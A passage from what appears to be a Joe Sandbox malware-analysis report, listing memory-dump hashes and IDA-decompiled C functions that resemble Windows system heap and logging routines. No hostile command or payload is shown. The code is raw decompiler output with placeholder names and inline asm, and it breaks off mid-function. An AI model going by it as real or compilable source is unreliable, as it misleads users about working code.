              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 17915155a1173d5896de913ac485ed85b6e2bbc5ea5d64c02a8690cb8e2501c5
              • Instruction ID: 60122b42fecbaceb31cb6078f4e9c9ff5e920532767dc0798c5e592e05106f16
              • Opcode Fuzzy Hash: 17915155a1173d5896de913ac485ed85b6e2bbc5ea5d64c02a8690cb8e2501c5
              • Instruction Fuzzy Hash: B2319031715665DFD7258F2AC841A7ABBE6EF56700B09C46AE845CB3A0F730E940D790
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 76%
              			E04C47016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
              				signed int _v8;
              				char _v588;
              				intOrPtr _v592;
              				intOrPtr _v596;
              				signed short* _v600;
              				char _v604;
              				short _v606;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				signed short* _t55;
              				void* _t56;
              				signed short* _t58;
              				signed char* _t61;
              				char* _t68;
              				void* _t69;
              				void* _t71;
              				void* _t72;
              				signed int _t75;
              
              				_t64 = __edx;
              				_t77 = (_t75 & 0xfffffff8) - 0x25c;
              				_v8 =  *0x4cbd360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
              				_t55 = _a16;
              				_v606 = __ecx;
              				_t71 = 0;
              				_t58 = _a12;
              				_v596 = __edx;
              				_v600 = _t58;
              				_t68 =  &_v588;
              				if(_t58 != 0) {
              					_t71 = ( *_t58 & 0x0000ffff) + 2;
              					if(_t55 != 0) {
              						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
              					}
              				}
              				_t8 = _t71 + 0x2a; // 0x28
              				_t33 = _t8;
              				_v592 = _t8;
              				if(_t71 <= 0x214) {
              					L6:
              					 *((short*)(_t68 + 6)) = _v606;
              					if(_t64 != 0xffffffff) {
              						asm("cdq");
              						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
              						 *((char*)(_t68 + 0x28)) = _a4;
              						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
              						 *((char*)(_t68 + 0x29)) = _a8;
              						if(_t71 != 0) {
              							_t22 = _t68 + 0x2a; // 0x2a
              							_t64 = _t22;
              							E04C46B4C(_t58, _t22, _t71,  &_v604);
              							if(_t55 != 0) {
              								_t25 = _v604 + 0x2a; // 0x2a
              								_t64 = _t25 + _t68;
              								E04C46B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
              							}
              							if(E04BE7D50() == 0) {
              								_t61 = 0x7ffe0384;
              							} else {
              								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
              							}
              							_push(_t68);
              							_push(_v592 + 0xffffffe0);
              							_push(0x402);
              							_push( *_t61 & 0x000000ff);
              							E04C09AE0();
              						}
              					}
              					_t35 =  &_v588;
              					if( &_v588 != _t68) {
              						_t35 = L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
              					}
              					L16:
              					_pop(_t69);
              					_pop(_t72);
              					_pop(_t56);
              					return E04C0B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
              				}
              				_t68 = L04BE4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
              				if(_t68 == 0) {
              					goto L16;
              				} else {
              					_t58 = _v600;
              					_t64 = _v596;
              					goto L6;
              				}
              			}

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fdf2fd799de4b1df17a772e9ce98239fba26e8d47f93d2a1f51f01fac0c733d4
              • Instruction ID: d8f52712fcb3f32581bab5bb1791e61afe94e4e926bdeeb087ceee48076e9fd3
              • Opcode Fuzzy Hash: fdf2fd799de4b1df17a772e9ce98239fba26e8d47f93d2a1f51f01fac0c733d4
              • Instruction Fuzzy Hash: CA31C4766057919FC321DF68C940A6AB3FAFFC8700F044A29F89987690E730F904D7A5
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 68%
              			E04BEC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
              				signed int* _v8;
              				char _v16;
              				void* __ebx;
              				void* __edi;
              				signed char _t33;
              				signed char _t43;
              				signed char _t48;
              				signed char _t62;
              				void* _t63;
              				intOrPtr _t69;
              				intOrPtr _t71;
              				unsigned int* _t82;
              				void* _t83;
              
              				_t80 = __ecx;
              				_t82 = __edx;
              				_t33 =  *((intOrPtr*)(__ecx + 0xde));
              				_t62 = _t33 >> 0x00000001 & 0x00000001;
              				if((_t33 & 0x00000001) != 0) {
              					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
              					if(E04BE7D50() != 0) {
              						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
              					} else {
              						_t43 = 0x7ffe0386;
              					}
              					if( *_t43 != 0) {
              						_t43 = E04C98D34(_v8, _t80);
              					}
              					E04BE2280(_t43, _t82);
              					if( *((char*)(_t80 + 0xdc)) == 0) {
              						E04BDFFB0(_t62, _t80, _t82);
              						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
              						_t30 = _t80 + 0xd0; // 0xd0
              						_t83 = _t30;
              						E04C98833(_t83,  &_v16);
              						_t81 = _t80 + 0x90;
              						E04BDFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
              						_t63 = 0;
              						_push(0);
              						_push(_t83);
              						_t48 = E04C0B180();
              						if(_a4 != 0) {
              							E04BE2280(_t48, _t81);
              						}
              					} else {
              						_t69 = _v8;
              						_t12 = _t80 + 0x98; // 0x98
              						_t13 = _t69 + 0xc; // 0x575651ff
              						E04BEBB2D(_t13, _t12);
              						_t71 = _v8;
              						_t15 = _t80 + 0xb0; // 0xb0
              						_t16 = _t71 + 8; // 0x8b000cc2
              						E04BEBB2D(_t16, _t15);
              						E04BEB944(_v8, _t62);
              						 *((char*)(_t80 + 0xdc)) = 0;
              						E04BDFFB0(0, _t80, _t82);
              						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
              						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
              						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
              						 *(_t80 + 0xde) = 0;
              						if(_a4 == 0) {
              							_t25 = _t80 + 0x90; // 0x90
              							E04BDFFB0(0, _t80, _t25);
              						}
              						_t63 = 1;
              					}
              					return _t63;
              				}
              				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
              				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
              				if(_a4 == 0) {
              					_t24 = _t80 + 0x90; // 0x90
              					E04BDFFB0(0, __ecx, _t24);
              				}
              				return 0;
              			}

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
              • Instruction ID: b25d8fcddf4c99e421f4fe2b6f778810a02732450f9eb96002820de6c2779f27
              • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
              • Instruction Fuzzy Hash: 40317C72705546BEEB08EBB5C480BF9FB64FF82208F0841DAC51C47241EB357A15D7A1
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 93%
              			E04C08EC7(void* __ecx, void* __edx) {
              				signed int _v8;
              				intOrPtr _v16;
              				intOrPtr _v20;
              				intOrPtr _v24;
              				char* _v28;
              				intOrPtr _v32;
              				intOrPtr _v36;
              				intOrPtr _v40;
              				signed int* _v44;
              				intOrPtr _v48;
              				intOrPtr _v52;
              				intOrPtr _v56;
              				signed int* _v60;
              				intOrPtr _v64;
              				intOrPtr _v68;
              				intOrPtr _v72;
              				char* _v76;
              				intOrPtr _v80;
              				signed int _v84;
              				intOrPtr _v88;
              				intOrPtr _v92;
              				intOrPtr _v96;
              				intOrPtr _v100;
              				intOrPtr _v104;
              				signed int* _v108;
              				char _v140;
              				signed int _v144;
              				signed int _v148;
              				intOrPtr _v152;
              				char _v156;
              				intOrPtr _v160;
              				char _v164;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				void* _t67;
              				intOrPtr _t70;
              				void* _t71;
              				void* _t72;
              				signed int _t73;
              
              				_t69 = __edx;
              				_v8 =  *0x4cbd360 ^ _t73;
              				_t48 =  *[fs:0x30];
              				_t72 = __edx;
              				_t71 = __ecx;
              				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
              					_t48 = E04BF4E70(0x4cb86e4, 0x4c09490, 0, 0);
              					if( *0x4cb53e8 > 5 && E04C08F33(0x4cb53e8, 0, 0x2000) != 0) {
              						_v156 =  *((intOrPtr*)(_t71 + 0x44));
              						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
              						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
              						_v164 =  *((intOrPtr*)(_t72 + 0x58));
              						_v108 =  &_v84;
              						_v92 =  *((intOrPtr*)(_t71 + 0x28));
              						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
              						_v76 =  &_v156;
              						_t70 = 8;
              						_v60 =  &_v144;
              						_t67 = 4;
              						_v44 =  &_v148;
              						_v152 = 0;
              						_v160 = 0;
              						_v104 = 0;
              						_v100 = 2;
              						_v96 = 0;
              						_v88 = 0;
              						_v80 = 0;
              						_v72 = 0;
              						_v68 = _t70;
              						_v64 = 0;
              						_v56 = 0;
              						_v52 = 0x4cb53e8;
              						_v48 = 0;
              						_v40 = 0;
              						_v36 = 0x4cb53e8;
              						_v32 = 0;
              						_v28 =  &_v164;
              						_v24 = 0;
              						_v20 = _t70;
              						_v16 = 0;
              						_t69 = 0x4babc46;
              						_t48 = E04C47B9C(0x4cb53e8, 0x4babc46, _t67, 0x4cb53e8, _t70,  &_v140);
              					}
              				}
              				return E04C0B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
              			}

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ff1e480591081f9abb70d6469127b47dad65b0f110b1e8636d12d001137e77de
              • Instruction ID: bcc546d555ae549c26389888bdd37e198d734a80cd0d62b0b644bdd97b106477
              • Opcode Fuzzy Hash: ff1e480591081f9abb70d6469127b47dad65b0f110b1e8636d12d001137e77de
              • Instruction Fuzzy Hash: 3D41C3B1D003189FDB14CFAAD980AADFBF5FB48314F5081AEE549A7240E7746A45CF60
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 74%
              			E04BFE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
              				intOrPtr* _v0;
              				signed char _v4;
              				signed int _v8;
              				void* __ecx;
              				void* __ebp;
              				void* _t37;
              				intOrPtr _t38;
              				signed int _t44;
              				signed char _t52;
              				void* _t54;
              				intOrPtr* _t56;
              				void* _t58;
              				char* _t59;
              				signed int _t62;
              
              				_t58 = __edx;
              				_push(0);
              				_push(4);
              				_push( &_v8);
              				_push(0x24);
              				_push(0xffffffff);
              				if(E04C09670() < 0) {
              					L04C1DF30(_t54, _t58, _t35);
              					asm("int3");
              					asm("int3");
              					asm("int3");
              					asm("int3");
              					asm("int3");
              					asm("int3");
              					_push(_t54);
              					_t52 = _v4;
              					if(_t52 > 8) {
              						_t37 = 0xc0000078;
              					} else {
              						_t38 =  *0x4cb7b9c; // 0x0
              						_t62 = _t52 & 0x000000ff;
              						_t59 = L04BE4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
              						if(_t59 == 0) {
              							_t37 = 0xc0000017;
              						} else {
              							_t56 = _v0;
              							 *(_t59 + 1) = _t52;
              							 *_t59 = 1;
              							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
              							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
              							_t44 = _t62 - 1;
              							if(_t44 <= 7) {
              								switch( *((intOrPtr*)(_t44 * 4 +  &M04BFE810))) {
              									case 0:
              										L6:
              										 *((intOrPtr*)(_t59 + 8)) = _a8;
              										goto L7;
              									case 1:
              										L13:
              										 *((intOrPtr*)(__edx + 0xc)) = _a12;
              										goto L6;
              									case 2:
              										L12:
              										 *((intOrPtr*)(__edx + 0x10)) = _a16;
              										goto L13;
              									case 3:
              										L11:
              										 *((intOrPtr*)(__edx + 0x14)) = _a20;
              										goto L12;
              									case 4:
              										L10:
              										 *((intOrPtr*)(__edx + 0x18)) = _a24;
              										goto L11;
              									case 5:
              										L9:
              										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
              										goto L10;
              									case 6:
              										L17:
              										 *((intOrPtr*)(__edx + 0x20)) = _a32;
              										goto L9;
              									case 7:
              										 *((intOrPtr*)(__edx + 0x24)) = _a36;
              										goto L17;
              								}
              							}
              							L7:
              							 *_a40 = _t59;
              							_t37 = 0;
              						}
              					}
              					return _t37;
              				} else {
              					_push(0x20);
              					asm("ror eax, cl");
              					return _a4 ^ _v8;
              				}
              			}

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d3660ead267eb88bc09ddce5f336423613bf482872c2450e7e5796c1c1601a1f
              • Instruction ID: 626d278e254ecd1dd9a9e49f42f2b45a2ea4a409b7ab53b2211298aa0d742a61
              • Opcode Fuzzy Hash: d3660ead267eb88bc09ddce5f336423613bf482872c2450e7e5796c1c1601a1f
              • Instruction Fuzzy Hash: EA318D75A14249EFD744CF18D841B9AB7E5FB09314F148296FA08CB351E631FD80CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 67%
              			E04BFBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
              				intOrPtr _v8;
              				intOrPtr _v12;
              				void* __ebx;
              				void* __edi;
              				intOrPtr _t22;
              				intOrPtr* _t41;
              				intOrPtr _t51;
              
              				_t51 =  *0x4cb6100; // 0x33
              				_v12 = __edx;
              				_v8 = __ecx;
              				if(_t51 >= 0x800) {
              					L12:
              					return 0;
              				} else {
              					goto L1;
              				}
              				while(1) {
              					L1:
              					_t22 = _t51;
              					asm("lock cmpxchg [ecx], edx");
              					if(_t51 == _t22) {
              						break;
              					}
              					_t51 = _t22;
              					if(_t22 < 0x800) {
              						continue;
              					}
              					goto L12;
              				}
              				E04BE2280(0xd, 0x17f8f1a0);
              				_t41 =  *0x4cb60f8; // 0x0
              				if(_t41 != 0) {
              					 *0x4cb60f8 =  *_t41;
              					 *0x4cb60fc =  *0x4cb60fc + 0xffff;
              				}
              				E04BDFFB0(_t41, 0x800, 0x17f8f1a0);
              				if(_t41 != 0) {
              					L6:
              					asm("movsd");
              					asm("movsd");
              					asm("movsd");
              					asm("movsd");
              					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
              					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
              					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
              					do {
              						asm("lock xadd [0x4cb60f0], ax");
              						 *((short*)(_t41 + 0x34)) = 1;
              					} while (1 == 0);
              					goto L8;
              				} else {
              					_t41 = L04BE4620(0x4cb6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
              					if(_t41 == 0) {
              						L11:
              						asm("lock dec dword [0x4cb6100]");
              						L8:
              						return _t41;
              					}
              					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
              					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
              					if(_t41 == 0) {
              						goto L11;
              					}
              					goto L6;
              				}
              			}











              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d9eb4784f9fcd876293803a3ea0102535b5b55c487a063adc56231819b896c7a
              • Instruction ID: 32a22553443c8f2db7f39bede485afd5057d87ffe40eb621544065b324218f34
              • Opcode Fuzzy Hash: d9eb4784f9fcd876293803a3ea0102535b5b55c487a063adc56231819b896c7a
              • Instruction Fuzzy Hash: BE31013A704A059BDB01DF58D8807A673A8EB18314F0400B8EE48DB201E778FD099BC1
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 76%
              			E04BC9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
              				signed int _t53;
              				signed int _t56;
              				signed int* _t60;
              				signed int _t63;
              				signed int _t66;
              				signed int _t69;
              				void* _t70;
              				intOrPtr* _t72;
              				void* _t78;
              				void* _t79;
              				signed int _t80;
              				intOrPtr _t82;
              				void* _t85;
              				void* _t88;
              				void* _t89;
              
              				_t84 = __esi;
              				_t70 = __ecx;
              				_t68 = __ebx;
              				_push(0x2c);
              				_push(0x4c9f6e8);
              				E04C1D0E8(__ebx, __edi, __esi);
              				 *((char*)(_t85 - 0x1d)) = 0;
              				_t82 =  *((intOrPtr*)(_t85 + 8));
              				if(_t82 == 0) {
              					L4:
              					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
              						E04C988F5(_t68, _t70, _t78, _t82, _t84, __eflags);
              					}
              					L5:
              					return E04C1D130(_t68, _t82, _t84);
              				}
              				_t88 = _t82 -  *0x4cb86c0; // 0x31007b0
              				if(_t88 == 0) {
              					goto L4;
              				}
              				_t89 = _t82 -  *0x4cb86b8; // 0x0
              				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
              					goto L4;
              				} else {
              					E04BE2280(_t82 + 0xe0, _t82 + 0xe0);
              					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
              					__eflags =  *((char*)(_t82 + 0xe5));
              					if(__eflags != 0) {
              						E04C988F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
              						goto L12;
              					} else {
              						__eflags =  *((char*)(_t82 + 0xe4));
              						if( *((char*)(_t82 + 0xe4)) == 0) {
              							 *((char*)(_t82 + 0xe4)) = 1;
              							_push(_t82);
              							_push( *((intOrPtr*)(_t82 + 0x24)));
              							E04C0AFD0();
              						}
              						while(1) {
              							_t60 = _t82 + 8;
              							 *(_t85 - 0x2c) = _t60;
              							_t68 =  *_t60;
              							_t80 = _t60[1];
              							 *(_t85 - 0x28) = _t68;
              							 *(_t85 - 0x24) = _t80;
              							while(1) {
              								L10:
              								__eflags = _t80;
              								if(_t80 == 0) {
              									break;
              								}
              								_t84 = _t68;
              								 *(_t85 - 0x30) = _t80;
              								 *(_t85 - 0x24) = _t80 - 1;
              								asm("lock cmpxchg8b [edi]");
              								_t68 = _t84;
              								 *(_t85 - 0x28) = _t68;
              								 *(_t85 - 0x24) = _t80;
              								__eflags = _t68 - _t84;
              								_t82 =  *((intOrPtr*)(_t85 + 8));
              								if(_t68 != _t84) {
              									continue;
              								}
              								__eflags = _t80 -  *(_t85 - 0x30);
              								if(_t80 !=  *(_t85 - 0x30)) {
              									continue;
              								}
              								__eflags = _t80;
              								if(_t80 == 0) {
              									break;
              								}
              								_t63 = 0;
              								 *(_t85 - 0x34) = 0;
              								_t84 = 0;
              								__eflags = 0;
              								while(1) {
              									 *(_t85 - 0x3c) = _t84;
              									__eflags = _t84 - 3;
              									if(_t84 >= 3) {
              										break;
              									}
              									__eflags = _t63;
              									if(_t63 != 0) {
              										L40:
              										_t84 =  *_t63;
              										__eflags = _t84;
              										if(_t84 != 0) {
              											_t84 =  *(_t84 + 4);
              											__eflags = _t84;
              											if(_t84 != 0) {
              												 *0x4cbb1e0(_t63, _t82);
              												 *_t84();
              											}
              										}
              										do {
              											_t60 = _t82 + 8;
              											 *(_t85 - 0x2c) = _t60;
              											_t68 =  *_t60;
              											_t80 = _t60[1];
              											 *(_t85 - 0x28) = _t68;
              											 *(_t85 - 0x24) = _t80;
              											goto L10;
              										} while (_t63 == 0);
              										goto L40;
              									}
              									_t69 = 0;
              									__eflags = 0;
              									while(1) {
              										 *(_t85 - 0x38) = _t69;
              										__eflags = _t69 -  *0x4cb84c0;
              										if(_t69 >=  *0x4cb84c0) {
              											break;
              										}
              										__eflags = _t63;
              										if(_t63 != 0) {
              											break;
              										}
              										_t66 = E04C99063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
              										__eflags = _t66;
              										if(_t66 == 0) {
              											_t63 = 0;
              											__eflags = 0;
              										} else {
              											_t63 = _t66 + 0xfffffff4;
              										}
              										 *(_t85 - 0x34) = _t63;
              										_t69 = _t69 + 1;
              									}
              									_t84 = _t84 + 1;
              								}
              								__eflags = _t63;
              							}
              							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
              							 *((char*)(_t82 + 0xe5)) = 1;
              							 *((char*)(_t85 - 0x1d)) = 1;
              							L12:
              							 *(_t85 - 4) = 0xfffffffe;
              							E04BC922A(_t82);
              							_t53 = E04BE7D50();
              							__eflags = _t53;
              							if(_t53 != 0) {
              								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
              							} else {
              								_t56 = 0x7ffe0386;
              							}
              							__eflags =  *_t56;
              							if( *_t56 != 0) {
              								_t56 = E04C98B58(_t82);
              							}
              							__eflags =  *((char*)(_t85 - 0x1d));
              							if( *((char*)(_t85 - 0x1d)) != 0) {
              								__eflags = _t82 -  *0x4cb86c0; // 0x31007b0
              								if(__eflags != 0) {
              									__eflags = _t82 -  *0x4cb86b8; // 0x0
              									if(__eflags == 0) {
              										_t79 = 0x4cb86bc;
              										_t72 = 0x4cb86b8;
              										goto L18;
              									}
              									__eflags = _t56 | 0xffffffff;
              									asm("lock xadd [edi], eax");
              									if(__eflags == 0) {
              										E04BC9240(_t68, _t82, _t82, _t84, __eflags);
              									}
              								} else {
              									_t79 = 0x4cb86c4;
              									_t72 = 0x4cb86c0;
              									L18:
              									E04BF9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
              								}
              							}
              							goto L5;
              						}
              					}
              				}
              			}



















              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: caca35679da4c896e86a0830e51b447b42f72085a625d9c3d4667e231fab7ce5
              • Instruction ID: 80f85f21016c9e7d7058e835d368555346c2b55b93d58cacd8326ba510d64fbe
              • Opcode Fuzzy Hash: caca35679da4c896e86a0830e51b447b42f72085a625d9c3d4667e231fab7ce5
              • Instruction Fuzzy Hash: 2E31C0B5A00284EFFB25DF68C5897ACB7F2FB49724F18818DC40467250C374B990CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 53%
              			E04BE0050(void* __ecx) {
              				signed int _v8;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				void* __ebp;
              				intOrPtr* _t30;
              				intOrPtr* _t31;
              				signed int _t34;
              				void* _t40;
              				void* _t41;
              				signed int _t44;
              				intOrPtr _t47;
              				signed int _t58;
              				void* _t59;
              				void* _t61;
              				void* _t62;
              				signed int _t64;
              
              				_push(__ecx);
              				_v8 =  *0x4cbd360 ^ _t64;
              				_t61 = __ecx;
              				_t2 = _t61 + 0x20; // 0x20
              				E04BF9ED0(_t2, 1, 0);
              				_t52 =  *(_t61 + 0x8c);
              				_t4 = _t61 + 0x8c; // 0x8c
              				_t40 = _t4;
              				do {
              					_t44 = _t52;
              					_t58 = _t52 & 0x00000001;
              					_t24 = _t44;
              					asm("lock cmpxchg [ebx], edx");
              					_t52 = _t44;
              				} while (_t52 != _t44);
              				if(_t58 == 0) {
              					L7:
              					_pop(_t59);
              					_pop(_t62);
              					_pop(_t41);
              					return E04C0B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
              				}
              				asm("lock xadd [esi], eax");
              				_t47 =  *[fs:0x18];
              				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
              				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
              				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
              				if(_t30 != 0) {
              					if( *_t30 == 0) {
              						goto L4;
              					}
              					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
              					L5:
              					if( *_t31 != 0) {
              						_t18 = _t61 + 0x78; // 0x78
              						E04C98A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
              					}
              					_t52 =  *(_t61 + 0x5c);
              					_t11 = _t61 + 0x78; // 0x78
              					_t34 = E04BF9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
              					_t24 = _t34 | 0xffffffff;
              					asm("lock xadd [esi], eax");
              					if((_t34 | 0xffffffff) == 0) {
              						 *0x4cbb1e0(_t61);
              						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
              					}
              					goto L7;
              				}
              				L4:
              				_t31 = 0x7ffe0386;
              				goto L5;
              			}





















              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: eb9a2506a531e4521537b0ed7a9be62d1c7e97071b90969cec8ce1fd6a04d5d2
              • Instruction ID: c00588e35c48cbb0f854113cd001790a0e23cecd5e62a2f08481cc47378ec6f7
              • Opcode Fuzzy Hash: eb9a2506a531e4521537b0ed7a9be62d1c7e97071b90969cec8ce1fd6a04d5d2
              • Instruction Fuzzy Hash: 5931AE31201B148FD721DF28C840B6AB3E5FF88718F1445ADE59A87A90EB75BC01DB90
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 77%
              			E04C46C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
              				signed short* _v8;
              				signed char _v12;
              				void* _t22;
              				signed char* _t23;
              				intOrPtr _t24;
              				signed short* _t44;
              				void* _t47;
              				signed char* _t56;
              				signed char* _t58;
              
              				_t48 = __ecx;
              				_push(__ecx);
              				_push(__ecx);
              				_t44 = __ecx;
              				_v12 = __edx;
              				_v8 = __ecx;
              				_t22 = E04BE7D50();
              				_t58 = 0x7ffe0384;
              				if(_t22 == 0) {
              					_t23 = 0x7ffe0384;
              				} else {
              					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
              				}
              				if( *_t23 != 0) {
              					_t24 =  *0x4cb7b9c; // 0x0
